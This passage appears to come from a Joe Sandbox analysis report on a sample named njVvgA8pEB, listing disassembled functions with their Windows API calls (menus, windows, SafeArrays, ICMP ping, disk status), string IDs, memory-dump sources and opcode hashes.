                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          • API String ID: 2820617543-1000479233
                                                                          • Opcode ID: 6ba8d301178de604414e4b61a9f4225d8eea5f6a0bc83168ac9c83a290f70876
                                                                          • Instruction ID: 02121c0083b6341025d548b72ed98162d4537e6e19e88a7c96d6b880eb8099ce
                                                                          • Opcode Fuzzy Hash: 6ba8d301178de604414e4b61a9f4225d8eea5f6a0bc83168ac9c83a290f70876
                                                                          • Instruction Fuzzy Hash: 9D519F311083019BC71AEF14C892AAFB7E9EFC5300F15882DF5999B2A2DB319D49CB53
                                                                          Function 00319837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __i64tow__itow__swprintf
                                                                          • String ID: %.15g$0x%p$False$True
                                                                          • API String ID: 421087845-2263619337
                                                                          • Opcode ID: 1ae361fdb79b33f21f94e94c5bf92c1c9f190c13b29cb328c7b6b89702d4e688
                                                                          • Instruction ID: c2a84370e6df90e976da7e90e131b06a822b581942581c7d387d55cd833b3fa3
                                                                          • Opcode Fuzzy Hash: 1ae361fdb79b33f21f94e94c5bf92c1c9f190c13b29cb328c7b6b89702d4e688
                                                                          • Instruction Fuzzy Hash: FC41DB715042099FDB2ADF34D852FB673E8FF4A310F2444AEE549DF291EA31A9418710
                                                                          Function 00397152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0039716A
                                                                          • CreateMenu.USER32 ref: 00397185
                                                                          • SetMenu.USER32(?,00000000), ref: 00397194
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00397221
                                                                          • IsMenu.USER32(?), ref: 00397237
                                                                          • CreatePopupMenu.USER32 ref: 00397241
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0039726E
                                                                          • DrawMenuBar.USER32 ref: 00397276
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                          • String ID: 0$F
                                                                          • API String ID: 176399719-3044882817
                                                                          • Opcode ID: 4fffdbdfbba024d71dd71a2b3588bd2c8345db9a2d4a22e3c330f91061972285
                                                                          • Instruction ID: 1319a5d717e2d0000684dfef09fb0a9fa031f36533c1ce60c8013fae1db82b01
                                                                          • Opcode Fuzzy Hash: 4fffdbdfbba024d71dd71a2b3588bd2c8345db9a2d4a22e3c330f91061972285
                                                                          • Instruction Fuzzy Hash: AC414775A11205EFDF22DFA4D884EDA7BB9FF49310F150429F945A73A1D732A910CB90
                                                                          Function 003974BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0039755E
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00397565
                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00397578
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00397580
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0039758B
                                                                          • DeleteDC.GDI32(00000000), ref: 00397594
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0039759E
                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003975B2
                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003975BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                          • String ID: static
                                                                          • API String ID: 2559357485-2160076837
                                                                          • Opcode ID: 74b5d4553ab586aa0e3a23b946c58366ea680aa441b35541fc41cb0d8195d450
                                                                          • Instruction ID: d652469a50a87a635c6762b6a41738986191d15ed14b52fc7d561b65cd29d170
                                                                          • Opcode Fuzzy Hash: 74b5d4553ab586aa0e3a23b946c58366ea680aa441b35541fc41cb0d8195d450
                                                                          • Instruction Fuzzy Hash: 72312772115215AFDF129FA4DC09FEA3B6DEF0A360F164225FA15E61E0C732D821DBA4
                                                                          Function 00336E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00336E3E
                                                                            • Part of subcall function 00338B28: __getptd_noexit.LIBCMT ref: 00338B28
                                                                          • __gmtime64_s.LIBCMT ref: 00336ED7
                                                                          • __gmtime64_s.LIBCMT ref: 00336F0D
                                                                          • __gmtime64_s.LIBCMT ref: 00336F2A
                                                                          • __allrem.LIBCMT ref: 00336F80
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00336F9C
                                                                          • __allrem.LIBCMT ref: 00336FB3
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00336FD1
                                                                          • __allrem.LIBCMT ref: 00336FE8
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00337006
                                                                          • __invoke_watson.LIBCMT ref: 00337077
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                          • String ID:
                                                                          • API String ID: 384356119-0
                                                                          • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                          • Instruction ID: ecc1b2d5216efb905ae84b5cd1161739aab28f3fc2723a319e09e7ed1b7198a3
                                                                          • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                          • Instruction Fuzzy Hash: 3371D9B6A00716ABD726AF69DCC2B5AB3F8AF04724F148539F514DB681E770ED048B90
                                                                          Function 00372527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00372542
                                                                          • GetMenuItemInfoW.USER32(003D5890,000000FF,00000000,00000030), ref: 003725A3
                                                                          • SetMenuItemInfoW.USER32(003D5890,00000004,00000000,00000030), ref: 003725D9
                                                                          • Sleep.KERNEL32(000001F4), ref: 003725EB
                                                                          • GetMenuItemCount.USER32(?), ref: 0037262F
                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0037264B
                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00372675
                                                                          • GetMenuItemID.USER32(?,?), ref: 003726BA
                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00372700
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00372714
                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00372735
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                          • String ID:
                                                                          • API String ID: 4176008265-0
                                                                          • Opcode ID: 51bf5320a13302c6b58f6d1d3f43b542602d42cc3c0a42c281e3e4c3cd2c5f18
                                                                          • Instruction ID: f5ccfc0669adc0b0974ab368e0a5d9ab9d503c804645fb9822ca357ead3598c5
                                                                          • Opcode Fuzzy Hash: 51bf5320a13302c6b58f6d1d3f43b542602d42cc3c0a42c281e3e4c3cd2c5f18
                                                                          • Instruction Fuzzy Hash: F3619D70900289AFDB27CF64DD88EBFBBBCEB06304F15845AE845A7251D779AD05DB20
                                                                          Function 00396F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00396FA5
                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00396FA8
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00396FCC
                                                                          • _memset.LIBCMT ref: 00396FDD
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00396FEF
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00397067
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow_memset
                                                                          • String ID:
                                                                          • API String ID: 830647256-0
                                                                          • Opcode ID: 58ddc9b180bd690119060ffa9da8ac87da1fbc8b1b213a24ce5c4f53d687db8f
                                                                          • Instruction ID: 90d415238a4daf1129356a9ce9983f96a4a8c3a55272ba26f8b3ed9eb990b938
                                                                          • Opcode Fuzzy Hash: 58ddc9b180bd690119060ffa9da8ac87da1fbc8b1b213a24ce5c4f53d687db8f
                                                                          • Instruction Fuzzy Hash: D6615B75A00208AFDB12DFA4DC81EEE77F8EB09710F10415AFA15EB2A1C771AE45DB90
                                                                          Function 00366B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00366BBF
                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00366C18
                                                                          • VariantInit.OLEAUT32(?), ref: 00366C2A
                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00366C4A
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00366C9D
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00366CB1
                                                                          • VariantClear.OLEAUT32(?), ref: 00366CC6
                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00366CD3
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00366CDC
                                                                          • VariantClear.OLEAUT32(?), ref: 00366CEE
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00366CF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                          • String ID:
                                                                          • API String ID: 2706829360-0
                                                                          • Opcode ID: 9f2e995f508faa32482550a7d9c1e9c5591c51983ca430f493060d01851e3eb7
                                                                          • Instruction ID: 59829b43f9f2ec9ad4058eae4c6e2df5fe66585c50333fa55806ecfac5d14566
                                                                          • Opcode Fuzzy Hash: 9f2e995f508faa32482550a7d9c1e9c5591c51983ca430f493060d01851e3eb7
                                                                          • Instruction Fuzzy Hash: AC415E71A002199FCF06DFA9D8459EEBBBDEF48354F00C06AE955EB261CB31A945CB90
                                                                          Function 00385732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00385793
                                                                          • inet_addr.WSOCK32(?,?,?), ref: 003857D8
                                                                          • gethostbyname.WSOCK32(?), ref: 003857E4
                                                                          • IcmpCreateFile.IPHLPAPI ref: 003857F2
                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00385862
                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00385878
                                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003858ED
                                                                          • WSACleanup.WSOCK32 ref: 003858F3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                          • String ID: Ping
                                                                          • API String ID: 1028309954-2246546115
                                                                          • Opcode ID: 297b5293f98f32cafe4b9421cb7ba043485d4a5dbf1475913d529fba416c1750
                                                                          • Instruction ID: 0b86ddad4cd5af03e558992c8934c26e71710726bd899c094ff8f16f8e42e8c0
                                                                          • Opcode Fuzzy Hash: 297b5293f98f32cafe4b9421cb7ba043485d4a5dbf1475913d529fba416c1750
                                                                          • Instruction Fuzzy Hash: 4B518E31604700DFDB12EF24DC45B6AB7E8EF48710F04896AF956DB2A1DB70E940CB42
                                                                          Function 0037B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0037B4D0
                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0037B546
                                                                          • GetLastError.KERNEL32 ref: 0037B550
                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0037B5BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                          • API String ID: 4194297153-14809454
                                                                          • Opcode ID: e732e200ad92831dadb29540a70a8951980f0edd125e3e9ef38a10069e16a69d
                                                                          • Instruction ID: 91fd2d042137ba00c711baf986f55f56e76b4ec00e78a5804335d950cf0a9cab
                                                                          • Opcode Fuzzy Hash: e732e200ad92831dadb29540a70a8951980f0edd125e3e9ef38a10069e16a69d
                                                                          • Instruction Fuzzy Hash: 63318535A00209DFC712DB68C845FEEBBB8FF49320F148166E509DB291DB759E41CB51
                                                                          Function 00368F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00369014
                                                                          • GetDlgCtrlID.USER32 ref: 0036901F
                                                                          • GetParent.USER32 ref: 0036903B
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0036903E
                                                                          • GetDlgCtrlID.USER32(?), ref: 00369047
                                                                          • GetParent.USER32(?), ref: 00369063
                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00369066
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1536045017-1403004172
                                                                          • Opcode ID: 85189faa6cf022618514dc879e3354785f5006f8a9038c52a255784d4bcaf31a
                                                                          • Instruction ID: 4614aa5ff9e02ca008ded41489f6cfe3c7a1f733c641d4c25042a847c5c65998
                                                                          • Opcode Fuzzy Hash: 85189faa6cf022618514dc879e3354785f5006f8a9038c52a255784d4bcaf31a
                                                                          • Instruction Fuzzy Hash: 6E21C875A00208BFDF06ABA0CC85EFEBB7DEF49310F10411AF9619B2A5DB765855DB20
                                                                          Function 0036907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
                                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003690FD
                                                                          • GetDlgCtrlID.USER32 ref: 00369108
                                                                          • GetParent.USER32 ref: 00369124
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00369127
                                                                          • GetDlgCtrlID.USER32(?), ref: 00369130
                                                                          • GetParent.USER32(?), ref: 0036914C
                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0036914F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1536045017-1403004172
                                                                          • Opcode ID: c5fee4ed291070c2ab4350d0c41e80608652b4b611816762b2b6c7abcf7ed76d
                                                                          • Instruction ID: 964a947632c435ceb1034640ab253cb508373a19b5a4dddc95b4a6d06fe319ab
                                                                          • Opcode Fuzzy Hash: c5fee4ed291070c2ab4350d0c41e80608652b4b611816762b2b6c7abcf7ed76d
                                                                          • Instruction Fuzzy Hash: 072171B5A00208BFDF16ABA4CC85FFEBB7CEF49300F104016B951972A5DB769855DB21
                                                                          Function 00369163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32 ref: 0036916F
                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00369184
                                                                          • _wcscmp.LIBCMT ref: 00369196
                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00369211
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                          • API String ID: 1704125052-3381328864
                                                                          • Opcode ID: b875ada32e950986062a30de5b1a923990432d1aea5a4f3dc21cf0673755ce46
                                                                          • Instruction ID: c530d1709b59ed6b2a4eda8a061b1955757fc008618babeb6325cb8226d3d712
                                                                          • Opcode Fuzzy Hash: b875ada32e950986062a30de5b1a923990432d1aea5a4f3dc21cf0673755ce46
                                                                          • Instruction Fuzzy Hash: FE110A3624830BB9FA132624DC17FE73B9C9B15760F214527FD00E44D5EF725C515A54
                                                                          Function 00377990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00377A6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafeVartype
                                                                          • String ID:
                                                                          • API String ID: 1725837607-0
                                                                          • Opcode ID: ee5cb371debe2ccf8a579f16d25deff07c95391ff5c6e1afc61d0a8c3f5ebba6
                                                                          • Instruction ID: 617aca2dfbffedcf15f6f9c546921d2cffbe487a8cabaf473473d7c6d0242dfc
                                                                          • Opcode Fuzzy Hash: ee5cb371debe2ccf8a579f16d25deff07c95391ff5c6e1afc61d0a8c3f5ebba6
                                                                          • Instruction Fuzzy Hash: 7EB1A47190421A9FDB22DF94C885BBEB7F8FF09321F218425E505EB251D778E941CB91
